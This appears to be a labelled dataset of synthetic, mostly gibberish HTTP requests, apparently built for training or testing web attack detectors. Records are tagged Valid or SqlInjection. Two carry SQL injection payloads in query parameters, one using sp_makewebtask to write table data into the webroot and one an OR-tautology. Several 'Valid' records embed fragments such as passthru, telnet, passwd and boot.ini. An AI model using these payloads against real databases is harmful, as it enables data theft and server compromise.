GET /oKWR-_Www7Lc75VY9/5DYigTA@PkBah/nvO3KDEP71Vx3rthca@K/eis9saiesoosksmbst.msf?70SyOtCXhtpass=lctyMeyepo%3Eye&@replace5D9=issCtss&wbl7t1a=33401&anityE9snfon=8861489&vmteeass=agginnkhw6N3iobhtd HTTP/1.1
Host: 228.104.130.41
Connection: rnt5
Accept: text/xml
Accept-Charset: *
Accept-Encoding: deflate;q=0.3, gzip, compress
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 101.47.35.21
Cookie: tgsSmqencJ=420;8N-l7k=ntwo
Cookie2: $Version="30"
Date: Sun, 08 Nov 09 03:06:44 GMT
ETag: W/"_4k3VQ9.RQjsae-KN"
Expect: 100-continue
From: 7urSh@tin1aU.biz
If-Modified-Since: Thu, 30 Jun 05 09:07:30 GMT
If-Unmodified-Since: Sun, 01 Jun 08 20:42:55 GMT
If-Match: "@4mSvjT7Y4m1QcNi"
If-None-Match: "CjI3W4.UhtZLbnXOfL"
If-Range: "smMmB4LH5wdUOjKoPoD0"
Max-Forwards: 0428
MIME-Version: 8.1
Pragma: qee2Aiu='eds'
Proxy-Authorization: Digest nc=3c06C92E
Authorization: Digest uri=http://77waO.be/ntlia0n/pwn3dh.dll
Range: 51-551841
Referer: http://www.jtlga0l.cz/9lfi/Itnwn/spsornsd/ltwlf.mdb
TE: trailers,gzip;q=0.8
Trailer: Range
User-Agent: ajqGTx http://www.wcOha5o.ch
UA-CPU: StrongARM
UA-Disp: 2659,0505,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 2360x349
Via: TomI4/4.1 44.109.151.185, 8.9 216.163.225.94, FTP/5.1 www.275rte.gif
Transfer-Encoding: deflate
Upgrade: Iinf/7.1, oavrcs/0.2, aMti/2.8, uud/0.6, sprmls/3.8
Warning: 665 8.130.241.150:99 "miciymt" 
X-Forwarded-For: 169.229.102.168
X-Serial-Number: 7492268797432274
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11286
Start - Id: 41097
class: SqlInjection
GET /Sglmeucrdbue3rrmllau/HI4OSpswnsZwwibgsound_/dtynagouig/tzmlass1/ilorodmesoruTrsn/nrudAlrcwkatixaes/ib2ewdyeaX/xW/eeSetBsw.html?oehees8ootjahz=%40ot&sUsrn01hnteodiu=75188&a1alarNr=8571429&BjK-cjLconnectQ=%27%3B+EXEC+++master.dbo.sp_makewebtask+%27c%3A%5Cinetpub%5Cwwwroot%5CRremcrn.js%27%2C++++%27SELECT+++ws+++FROM++oymyBh++++WHERE++xtype%3D%27%27U%27%27%27&oAZGZzJv=623 HTTP/1.0
Host: www.dMoaaDqtR.fr
Connection: Rashte
Accept: */*;q=0.0
Accept-Charset: windows-1255, gb2312, iso-8859-3;q=0.7, hz-gb-2312
Accept-Encoding: *
Accept-Language: nivoq-boeudl, oIYpq-ti;q=0.1, xlcst-ane70n;q=0.5
Cache-Control: econd=dogpnl4T
Client-ip: 26.15.87.96
Cookie: seepe4Ejene=snGdswds\window.openrsterfn:;H8tCeAPer=cepassthruq oxtermml)cd: r$forms;uTiOpuaarta=u;sg35sO=0tdxt;1mail0vSlibservicesuEMYchild=ksfbn
Cookie2: $Version="810"
Date: Mon, 01 Mar 04 09:27:02 UTC
ETag: "LCyAUTv1NDlcy2-tThpH"
Expect: 100-continue
From: ixits@nymeatnrae.gov
If-Modified-Since: Fri, 02 Apr 04 16:35:36 UTC
If-Unmodified-Since: Thu, 08 May 08 24:15:23 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 18
MIME-Version: 7.6
Pragma: ttd=meyga
Proxy-Authorization: Digest opaque="sqsll"
Authorization: nedle 4l5o=4osg
Range: 1-877
Referer: /c5Ray/suortkNr/uffbnto/boooa/aneaoee.doc
TE: chunked;q=0.1,trailers,trailers
Trailer: User-Agent
User-Agent: t4Vy0tL http://www.ionrs.it
UA-CPU: PowerPC
UA-Disp: 926,7799,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: FTP/1.7 www.aepqY.css:07
Transfer-Encoding: proa2
Upgrade: trcoos/7.4, ocdNs/3.5
Warning: 451 198.72.245.237:3639 "gyrmlem" 
X-Forwarded-For: 84.186.228.20
X-Serial-Number: 54708069609443708
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41097
Start - Id: 2963
class: Valid
GET /naiknssfludhrh/Kniotdbn3ohn3oe/kMUy/iQaSW1/3aQ_MJ8/2qHFbIcUba@pcyj.shtml?oUnlgssa=jeaxbflqaocttt8&5Aooar3nbn=copyfl0dIstdiny&eli2ienSh=%26dunion%3Ccifuxsot%270rtnert&1-Sim=5riaylibaNS+c%5D1%5Cyw%3Ci&mgm3nemorowM=a5t&cghSustu=cGzYEB_Ed6&Aoidilwnei=gcHkBh2M&ttsoi0ec=5&ote5sdrz=552&lftieaait1lsxt=ej5M&yk=hr1m%40&veifytw=44txpnh HTTP/1.1
Host: 54.125.0.180
Connection: close
Accept: audio/basic;q=0.9, audio/x-wav;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: identity, gzip, deflate
Accept-Language: priahr-5erO, h-f3;q=0.0, trbek-hteey, no-i;q=0.8, tcith-rajthr3;q=0.2
Cache-Control: n9i=orsteeh
Client-ip: 27.132.127.51
Cookie: tplNas8G=s eab?agIwj2d;l3idea=83117;@i@u4_XD_=aJ@ef;sgnoeei=et51n<htq;gii (bpr ;esaGgei4etee=6egiymz0;rcHhongee=0848421129
Cookie2: $Version="1"
Date: Mon, 14 Mar 05 12:05:12 UTC
ETag: W/"gkaRWdgtR1N8TwMOaI@"
Expect: 100-continue
From: tbo4@etteoeTp.st
If-Modified-Since: Sun, 20 Aug 06 14:26:50 UTC
If-Unmodified-Since: Thu, 12 Jan 06 09:48:10 CET
If-Match: "A_DWtfWsW9fD7TZcM"
If-None-Match: "12_hT4z7W@xrNG1"
If-Range: "3v_P8YiqkVWdPtu2y3at"
Max-Forwards: 081
MIME-Version: 1.3
Pragma: AyC=eEtEw
Proxy-Authorization: Basic bGUxcjpiQTlh
Authorization: Digest response="BdD9bcBEfcb48D884C6dE1dDC64202D2"
Range: 81466-,-72397
Referer: /iekrncP/emsewein/bsattAp/h3o5aa.asmx
TE: trailers
Trailer: Proxy-Authorization
User-Agent: tUaO0dl0q5 http://www.nl8seifd.net
UA-CPU: StrongARM
UA-Disp: 088,2412,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8247x2505
Via: 3.1 www.enee.shtml
Transfer-Encoding: compress
Upgrade: er1/3.7, ohbtar/9.6, igrns/9.6, QebnrE/9.1, rWoN/5.7
Warning: 679 121.176.212.56 "aajSEEaaS9ry" "Wed, 04 Oct 06 05:54:46 CET"
X-Forwarded-For: 230.76.229.166
X-Serial-Number: 1920071
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2963
Start - Id: 9724
class: Valid
GET /ue6nmit/tPndtso0/w.6UZaYi/orViLCAY0rSYHYy/UVwl0G7/ramD6wY_3j1-IZY/7-/io_Dnn2ulq_R0jMjgG5p.css?opstiDeu=8496&uDhooBs8tNmo=%7EieseaE9nm&rymO9i75ecntes=joxJ&6ePxh44=128685&iaiat=tblkc&scriptKHW=bo%3Busrmfromov+&YirYmbb=aAPvFJJX&aatwLpbel9=oEhttp&xvM4=e9n&eta=7814758157&yo=n%2Fee%3BMUed%3B1pT--node&ings7rrA1sa=aprocessing-instruction&le=9322&hb=04&sauHotahs9ua3ao=gu+i HTTP/1.0
Host: www.e1daEisdee.com
Connection: close
Accept: text/xml, text/plain
Accept-Charset: windows-1252;q=0.4, windows-1254, cp-936
Accept-Encoding: deflate;q=0.3, deflate, gzip, compress;q=0.3
Accept-Language: hhots-tal4sejn, e1-reextrl;q=0.2
Cache-Control: no-store
Client-ip: 23.225.133.49
Cookie: tIrnq5Sete=eaoh;io=rirhwolaa1
Cookie2: $Version="308"
Date: Tue, 11 Mar 08 12:47:34 GMT
ETag: "6YCZuN9AnYs7uX7ixdEh"
Expect: rc4I3=nnta
From: a5e2p@0aodla.de
If-Modified-Since: Thu, 01 Feb 07 06:33:57 UTC
If-Unmodified-Since: Sat, 08 Jan 05 13:16:51 UTC
If-Match: *
If-None-Match: "UpFQ0VSOeSn7.geZ.X"
If-Range: "b.y934aBR7qb5_nGF95"
Max-Forwards: 3
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest nc=aCF05B7C
Authorization: tanpT2 txgadh=me6n6r
Range: 56419-6047,31908-,-5753
Referer: http://ht5p1.org/wpmt/td0oea/eeRmlSa2.mp3
TE: gzip;q=0.2,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.8 (Windows; U; Win98 9.6; b1-et; rv:2.0.1) Gecko/58984656
UA-CPU: StrongARM
UA-Disp: 5705,3975,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 6817x021
Via: HTTP/6.5 www.it7g.css:3608, HTTP/7.1 www.6oOacrb.jpg:302, 8.4 www.bsRal.gif
Transfer-Encoding: compress
Upgrade: e3d/8.2
Warning: 162 www.odini6n.jpg "npswobidL" "Mon, 27 Aug 07 18:43:51 UTC"
X-Forwarded-For: 156.177.170.9
X-Serial-Number: 66630290652
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9724
Start - Id: 31712
class: Valid
GET /wdYJDEFvO/e7tatObS4tohwseelh/aIgQaCS0YScnRKRj/ptedpioPnn3rapeAnire/ow6b_0dh_UBgtj.html?rayd0slssA=qp2xid6+O+eTa%2Faa&rtgeqIim=pXcJ5zx_f63q&au=nb-sby91&vbscriptexecboot.iniQ_JICpjv=iLurrO HTTP/1.0
Host: 17.94.31.84
Connection: close
Accept: audio/x-wav;q=0.4, audio/basic
Accept-Charset: *;q=0.5
Accept-Encoding: identity
Accept-Language: tizesepw-rE;q=0.1, LI-esa1y, xct-ee7;q=0.6, otweheO-7obmoh
Cache-Control: yalriL=a
Client-ip: 88.29.222.246
Cookie: Yvs2-locationDtelnet=rem2t;i83flulal=508
Cookie2: $Version="65"
Date: Sun, 24 Jul 05 08:51:46 GMT
ETag: W/"DtX56aDqEy@ryLDe"
Expect: 100-continue
From: rKtsre@uhAOD.com
If-Modified-Since: Sat, 18 Nov 06 01:06:19 CET
If-Unmodified-Since: Thu, 18 May 06 17:09:45 CET
If-Match: "X8@f3M5Lo4daS0GekMd"
If-None-Match: *
If-Range: Tue, 07 Feb 06 04:35:48 UTC
Max-Forwards: 0
MIME-Version: 2.9
Pragma: w1z=cu
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic ZXFlc3RuSW86c3RkSXJlbA==
Range: 8-
Referer: /oti0oae/ehmad/u3he/wetiu.png
TE: chunked;q=0.9,chunked
Trailer: TE
User-Agent: tsh8 (ruET5hcoxV)
UA-CPU: PowerPC
UA-Disp: 574,324,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9430x7643
Via: 8.9 www.1crtnnUz.htm, FTP/5.9 www.aEao.gif, 7.2 210.38.185.204
Transfer-Encoding: compress
Upgrade: irn/2.8, 7yn/6.5
Warning: 582 63.98.99.8 "lare9ilntstaLhew" "Tue, 29 Nov 05 02:58:50 UTC"
X-Forwarded-For: 84.104.88.36
X-Serial-Number: 48619214669
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31712
Start - Id: 30008
class: Valid
GET /o6u/eWowN/jaKqHGRdgTscript/kzChF/-shtacceswinntS/uscriptFpasswd1VwD/eokh1tJbv/lctei.png?neleanheeneqeu=anR&Red2gO=ehe-tMonnPnr&hgtoj=151718&4tonEc=sl0zahtJZp3&Io7jks=01652&lu=eatoof7aouje HTTP/1.0
Host: www.qentifig.uk
Connection: ardhq
Accept: audio/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: min-fresh=303
Client-ip: 142.42.77.41
Cookie: een=s6R;Oeadgi=4634646;etEnvcoa=echosa-nok;z1t=3;rrQt2=7437073;ldrDozi7Eatert=34
Cookie2: $Version="20"
Date: Sat, 24 Oct 09 10:57:46 UTC
ETag: "Vd9T_.-zQHzMcPDdh"
Expect: yovisw6q=losnss
From: aeeNsEvt@wbsohnw.st
If-Modified-Since: Mon, 17 Oct 05 09:36:19 UTC
If-Unmodified-Since: Mon, 10 Nov 08 15:51:09 CET
If-Match: *
If-None-Match: "hyzu.BV8mbdl6ajwA"
If-Range: Sun, 27 Feb 05 23:31:48 UTC
Max-Forwards: 76
MIME-Version: 4.2
Pragma: h4rult9=hTuEb
Proxy-Authorization: Basic OHdmZTFrcjpvYWlucmVlcw==
Authorization: Digest realm
Range: 407657-,-1719
Referer: http://5wvaad.gov/hnenh/me4t/qrcali.nsf
TE: gzip;q=0.5
Trailer: Accept-Encoding
User-Agent: 4its/5.1
UA-CPU: 68000
UA-Disp: 644,8528,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5067x616
Via: 5.4 130.210.151.238, FTP/8.5 247.46.230.68:69, 0.2 5.157.109.105
Transfer-Encoding: hazw
Upgrade: zco8u/3.9, 7ddF/2.0, P5tob/6.7
Warning: 929 111.138.94.34 "fYos2dhjediq09q9ela" "Sun, 20 Sep 09 07:36:42 GMT"
X-Forwarded-For: 69.246.154.213
X-Serial-Number: 2857393
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30008
Start - Id: 641
class: Valid
GET /sdtik/rmtkOepuoua/islD8Yx-yYHW2u1-A3/bmo0ohrtki/4Y/VBJmocha/Icp5nsajeuswwp/mCETL7ULN6L79tOhNQ0/ho.js? HTTP/1.1
Host: www.ozrnl.de
Connection: close
Accept: application/rtf;q=0.1
Accept-Charset: windows-1257;q=0.1
Accept-Encoding: compress;q=0.1
Accept-Language: 6trehte4-ikmtrT, tairtsls-zsutxrhs;q=0.9, Neo-8lv;q=0.7
Cache-Control: min-fresh=1
Client-ip: 197.109.137.18
Cookie: utpreedesn4=26421;whereIjMiz2=655;copy1_-UKP=n'dh-
Cookie2: $Version="01"
Date: Sun, 26 Dec 04 05:38:05 UTC
ETag: W/"IDQFd9QlRPXl8zOYPy"
Expect: h3r9eig
From: ystebe@hnBteRt6v.be
If-Modified-Since: Sun, 07 Mar 04 02:55:38 GMT
If-Unmodified-Since: Wed, 30 Sep 09 01:52:52 GMT
If-Match: "bpOR.f3f76df-Wex5"
If-None-Match: *
If-Range: Wed, 26 Dec 07 07:48:14 GMT
Max-Forwards: 13
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: NTLM all0bmFoaXVuYWNhYW9yNG8xYXdFbnJ0YXloNXNhT3NyYmFCb2VleXQ=
Authorization: Digest nc=cbBAf31F
Range: 56950-,28317-808,-9
Referer: /1haeEhr/dSit9i/eoh0aeea/mghIteOi.php
TE: deflate;q=0.5,gzip;q=0.1,deflate
Trailer: If-None-Match
User-Agent: Mozilla/0.9 (Windows; U; Win 9x 4.0; st-Ns; rv:2.9.4) Gecko/56825107
UA-CPU: x86
UA-Disp: 7551,458,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1676x432
Via: cpodc/7.3 254.241.104.200, aiabo8/0.6 51.130.114.243, 5.2 www.aoUu.gif
Transfer-Encoding: gzip
Upgrade: leEya/2.8, m3dun/4.8, eaig/9.5
Warning: 822 www.doik.shtml:3 "omlq" "Sat, 28 Aug 04 02:17:50 UTC"
X-Forwarded-For: 120.114.184.187
X-Serial-Number: 541499677250739
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 641
Start - Id: 42063
class: SqlInjection
GET /ttnidlehA/de5./libchxaqi/rIsbnaEn/ye/sHtFi/@qPd5_5R8pkbg/%uGW/c@tD7d2PcDqj55j@..exe?lisitoscnnOi=443772&ut2bpassthruidfOY_K=7588530368&phpUhA.KF=%27+++%2F**%2F++++OR+++%2F**%2F+++++%277esl6h%27+++++%3E+++%27S&sw=32746 HTTP/1.0
Host: www.baoermx.be
Connection: keep-alive
Accept: */*
Accept-Charset: us-ascii;q=0.3, x-mac-turkish;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: leswx=n2ahi
Client-ip: 147.90.51.52
Cookie: lrt0NSarsahreO=o0ddD)eAi3e;6eaLbdetti3=7322632;gl=000033411
Cookie2: $Version="58"
Date: Wed, 25 May 05 09:32:54 GMT
ETag: "i.fQ@lKKfWMSWDgsw9"
Expect: dntttuy
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Thu, 31 Jul 08 15:42:21 GMT
If-Unmodified-Since: Wed, 28 Apr 10 03:54:51 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 18 May 09 18:10:29 UTC
Max-Forwards: 32
MIME-Version: 0.9
Pragma: b='obv'
Proxy-Authorization: miIioo U7Eesss=eomtuaa
Authorization: Basic cmVhZWllbW46UnNuY0llYQ==
Range: -99729
Referer: /ior8/ba6u9eoh/lf8b2/ss4i5tn.css
TE: trailers,deflate;q=0.3
Trailer: Range
User-Agent: hhr1oXa/7.9.9.8
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9544x100
Via: 9.8 150.228.124.21:5337, HTTP/1.6 www.emooteM.png
Transfer-Encoding: compress
Upgrade: rRlEh/1.9
Warning: 264 99.10.30.250 "a0gtsj1ecytcw5Eqrc" 
X-Forwarded-For: 206.224.167.230
X-Serial-Number: 001394948859071824
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42063
Start - Id: 18007
class: Valid
GET /laxp_d/tcDp1/4ERB/urKvmCG.90YPcITe.js?klr=702268&JLnexecQU=o+%3A%3B&t5ntd1rBeafe2o=6080&y9EdEu5OYeidu=alsia%5D&8ebnk=rtmpyls8cht&dtisgon=ubpnya&r7teeaeA=uKTsD0NF1.rD&_Ni5=e6fJmVaNY.Hy HTTP/1.1
Host: www.tAtrlssft0.uk
Connection: nItfndQ
Accept: video/quicktime
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 224.118.55.101
Cookie: ndo0ocsininvatr=1tnatntmjnq7a;7sgnye=Ts'os
Cookie2: $Version="288"
Date: Thu, 19 Aug 04 10:38:55 UTC
ETag: "KKiktc_31xb1pEF-S"
Expect: 100-continue
From: 1fhht@jeisbtlV.biz
If-Modified-Since: Tue, 10 Feb 09 01:47:21 CET
If-Unmodified-Since: Fri, 11 Jun 04 18:52:21 UTC
If-Match: *
If-None-Match: "D8-o4a@VdqT6d25KEtOu"
If-Range: *
Max-Forwards: 6930
MIME-Version: 4.7
Pragma: y='tec6p2'
Proxy-Authorization: Digest uri=http://ksSrmna.ch/he8c/tvrHsfIh/uruss.mp3
Authorization: Basic cm9hZTpNb29uNUFs
Range: -97846,05989-6,385-85231
Referer: /ti519/hnstAruo/Grafi.bin
TE: deflate,trailers,trailers
Trailer: Range
User-Agent: Mozilla/8.2 (Machintosh; U; PPC 0.2; rs-8e; rv:4.6.2) Gecko/39388007
UA-CPU: x86
UA-Disp: 8850,7638,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 642x5791
Via: crniea/6.0 151.18.175.218, FTP/6.3 www.wep9iE3C.tiff, 6.7 www.ooEnA.jpg
Transfer-Encoding: gzip
Upgrade: ii7hn/3.4, rwte/5.6
Warning: 949 59.202.70.214 "dniryhss1asaesunNun" "Wed, 17 Jun 09 23:54:21 GMT"
X-Forwarded-For: 104.233.139.60
X-Serial-Number: 094321
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18007
Start - Id: 4647
class: Valid
PUT /xG2p4iqq/iI/9moZB1U@aRwoT2eTQ9ii/HGs1divrminp6Qd/xxwLb_k78aTx/tdnte0owd1resd6meomb/oltohaotic6r3s7t/crngnzrs/FMUlUz_gtelnetz5WgoptF/U@JQconnect/lriw4t5e.js? HTTP/1.0
Content-Length: 221
Content-Language: a4m,asfeji,niTy
Content-Encoding: compress
Content-Location: /nSggxho/uktqfiEQ/iloesba.php3
Content-MD5: M25oZXNwRXpIb050aHNBUg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Dec 05 21:29:15 CET
Last-Modified: Wed, 04 Jun 08 03:30:41 GMT
Host: www.epem1.com
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: windows-1252;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 34.184.9.198
Cookie: ins3sm0geJnm=3368221109
Cookie2: $Version="0"
Date: Mon, 26 Jul 04 12:28:29 CET
ETag: "bsnEdCJyg8Am@@oHjnt"
Expect: 100-continue
From: e8Lt@yeTis8dS8t.st
If-Modified-Since: Mon, 10 Aug 09 09:57:39 UTC
If-Unmodified-Since: Sat, 02 Sep 06 21:04:44 UTC
If-Match: "Mwfbbvr4d.Fv2Il"
If-None-Match: *
If-Range: *
Max-Forwards: 29
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM cmRsYWJ3ZnN0eW55aG1hTXdlZXpyYWYxTmVhdnVqa3Rib2k=
Authorization: Digest username="tiorasTw"
Range: 232-0,-44178
Referer: /Sh9xdc.pdf
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/8.0 (compatible; Konqueror/4.5; WinNT; oBwUrsh; nnnbe)
UA-CPU: 68000
UA-Disp: 617,830,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0964x700
Via: HTTP/0.8 www.nTOuh.htm, 9.3 www.isoia.gif, 8.1 223.77.241.184
Transfer-Encoding: identity
Upgrade: tmhgq/3.2
Warning: 819 www.mYrzru.html "tseyaaweocinii" 
X-Forwarded-For: 71.251.211.91
X-Serial-Number: 42430609467360464
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

InQhomeMO-=310&Sovy3oy=hcyiti6hucilsd&ehra2mn7u=ovsoter)e@f@t&reonhrfovned=7m8Lmssgo&Openci26=eammeooyol&rut=aM7_JIJuQa&ypyconnect10=zn&qstbiuqtkilPca=7104527&rdbehdet=tGu8&oke56dcm1n=8875312&dl5iMweoenoje=883211518

End - Id: 4647
Start - Id: 12511
class: Valid
GET /coodwscmeoaaouo/yorsr/euaerpd6aee2um3e/iv/eGfeqbpn/L83bX3etcrmvarVXOF/xposition.ot9EE3Xh/h.@SPoSXnsWAft.MF.jpg?T2ntinkearohmd=t7t3inhy&Xoiorseovr=uSu+e7f+Oa%5Dic6&C_zE=61864&k8_BT1Qrj=nmuml&HNr=2882&rperldHlbD7eI6=%7Ce&d8lsrlrihhud8=jp+si%27f&rctIrtemtbi6e=tEb8kat2h%40&ef2dnttiangAL=sBfac&tsdcup=16&aqeiRr=idtnv&Sfipqr1b=6 HTTP/1.0
Host: www.enrn.be:494
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-japanese;q=0.3, windows-874;q=0.3, iso-8859-7, big5;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 0.18.234.91
Cookie: ilq=mfN;thSta=t3h5Wg;iptaalenelwnAdt=a-mIVa_Sj;ei6amieamc=s+4
Cookie2: $Version="9"
Date: Wed, 18 May 05 03:13:17 GMT
ETag: W/"Xr-@6gcRG0oeydpwL"
Expect: ttajmaTs
From: deAe@iiia.st
If-Modified-Since: Tue, 08 Nov 05 10:40:11 UTC
If-Unmodified-Since: Thu, 04 Dec 08 17:31:17 GMT
If-Match: "Pk0W_DWtAU_ufKTV"
If-None-Match: "h2Hw6QeWEgUFqA3WjpN"
If-Range: *
Max-Forwards: 0262
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest qop=tlainatN
Authorization: Basic ZGNubzpvbmVh
Range: 9895-033107
Referer: /hyepaee/gosas/thftshlh/Ilenta/cie8sn.mdb
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/8.7 (Windows; U; WinNT 4.6; si-nE; rv:1.5.0) Gecko/84278601
UA-CPU: MIPS
UA-Disp: 634,9417,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 388x558
Via: 5.6 194.89.203.132, nile16/9.6 www.ntihi.css, 3.8 101.71.171.174
Transfer-Encoding: gzip
Upgrade: hbxi/8.3
Warning: 735 75.83.0.37:89 "hex0od" "Wed, 06 Dec 06 03:12:32 CET"
X-Forwarded-For: 76.244.65.161
X-Serial-Number: 2197491883894
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 12511
Start - Id: 7433
class: Valid
POST /XtW5swhereqdU/cbWE6ofrgToeshe7e/c5naviPteorh/3N/2M3Cy08HIKzofPZJNOO/ntvOetsrtl/oDA_45QH9p4942.ED/wI6hIPeZUiV3RnrnV/aareere3yRsas8rnrQe/tn6H5Di54L/re4rhhh3aotsmsbOna3/fromXnI.ymeta_UEi.cfm? HTTP/1.1
Content-Length: 106
Content-Language: hgs,i
Content-Encoding: compress
Content-Location: /tTesce6r/Rzrr/kd6weI/rE5luo/rymi.jpeg
Content-MD5: NHRlbHR4ZW1uNWFSYWVSNA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Jun 04 04:38:55 UTC
Last-Modified: Sun, 05 Nov 06 06:14:42 UTC
Host: www.8ethajA.biz
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-8859-1;q=0.4, x-mac-japanese, x-mac-turkish;q=0.4, x-mac-chinesetrad, windows-1252
Accept-Encoding: gzip
Accept-Language: oil-aehh;q=0.2, a2-eirnieee
Cache-Control: max-age=1
Client-ip: 88.207.186.172
Cookie: ddtrdmAl=sIseLF;smi25sgu2i=eTzVNdf7E;vossnrel0tsec=ll%;23BK@cMrcp@1lo=0362
Cookie2: $Version="236"
Date: Tue, 07 Sep 04 15:39:33 UTC
ETag: "6vz7sTtTkVMjnt6z"
Expect: 100-continue
From: etjre@ngegAdwy.net
If-Modified-Since: Sat, 15 Sep 07 24:30:34 GMT
If-Unmodified-Since: Thu, 19 Jul 07 21:19:40 GMT
If-Match: "c_a3XpOyvViMivE1fh"
If-None-Match: "DKaSgNw0k_BGtb_S"
If-Range: Thu, 26 May 05 17:26:06 CET
Max-Forwards: 822
MIME-Version: 0.7
Pragma: Sdoxa=tNren
Proxy-Authorization: NTLM bmU4RW9kd2dobnNtaXJ0YWNub2dyOW55cm1lUE5kdTFmd2dhbGVIMHZpdDA=
Authorization: Basic bnJpbGk5eWU6c2VpYWVXdEE=
Range: 1-587,1-,-06
Referer: /enbo8/cZtt/daec.fgf
TE: chunked,trailers
Trailer: Transfer-Encoding
User-Agent: wnftnote/3.2.5.9.1
UA-CPU: MIPS
UA-Disp: 634,725,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2293x2568
Via: 9.3 21.243.28.195
Transfer-Encoding: gzip
Upgrade: aais5e/5.3, eke/9.2, tigCl/6.9
Warning: 865 www.fNat6e.html "Easpea4" 
X-Forwarded-For: 208.252.109.22
X-Serial-Number: 51648085743746
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

nCev=meTeUd aihdeL(r&iSacn6aeo9b=aZUiSq87G&2h10atD7=0&EhiaeMIymeet=dend&feosoh=nnetcatnevallhtpassiframe

End - Id: 7433
Start - Id: 4558
class: Valid
POST /sMYWx/8qC8en_TyM3Ezi7.cgi? HTTP/1.1
Content-Length: 120
Content-Language: aeYhawt
Content-Encoding: deflate
Content-Location: /rerajt/punrs/iietN3h/io4m.wmn
Content-MD5: cm9lcml3NmhoWTJsZGpybw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 29 Apr 07 18:38:57 UTC
Last-Modified: Wed, 09 Jul 08 06:17:09 GMT
Host: 147.123.46.3:34
Connection: keep-alive
Accept: video/mpeg;q=0.2, image/*;q=0.3, image/jpeg
Accept-Charset: cp-950, euc-kr, x-mac-chinesetrad;q=0.1, iso-8859-4;q=0.5
Accept-Encoding: *;q=0.1
Accept-Language: t-1uOe;q=0.0, I1m-Nr5;q=0.9, gq-u;q=0.6, aubtaoa-aerzxd;q=0.3, unir-f;q=0.2
Cache-Control: eL=a
Client-ip: 168.83.155.128
Cookie: oxcaikartved=e9;G3elx=4eopxjtena3a;test7Qso=661832;MgtsjDclhi2s5=fiE
Cookie2: $Version="6"
Date: Mon, 20 Jun 05 02:58:12 CET
ETag: "xLyaQ.3agzdd7R3i82dq"
Expect: 100-continue
From: rsnydvh6@sezlefn.be
If-Modified-Since: Sun, 18 Jan 09 20:04:21 CET
If-Unmodified-Since: Tue, 22 Nov 05 02:51:30 UTC
If-Match: *
If-None-Match: "sh81O.O5K4oWuKX"
If-Range: Sat, 01 Jan 05 12:46:12 UTC
Max-Forwards: 3556
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: uaahe i2mes2rD=Tlhhrotn
Authorization: 6nhni opcl=Neatehet
Range: 5-7
Referer: http://www.eawwe.be/iltsma/0pq1mU/hwNnxrr.pdf
TE: deflate,trailers,gzip;q=0.8
Trailer: Expect
User-Agent: Mozilla/4.5 (X11; U; Linux i386 1.9; oe-dl; rv:0.2.2) Gecko/21860263
UA-CPU: MIPS
UA-Disp: 067,349,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 308x492
Via: 4.7 124.197.141.118, FTP/1.6 www.snorn.png
Transfer-Encoding: gzip
Upgrade: y3ba/9.8
Warning: 589 28.189.6.206 "nrrp" "Sun, 11 Sep 05 11:50:25 GMT"
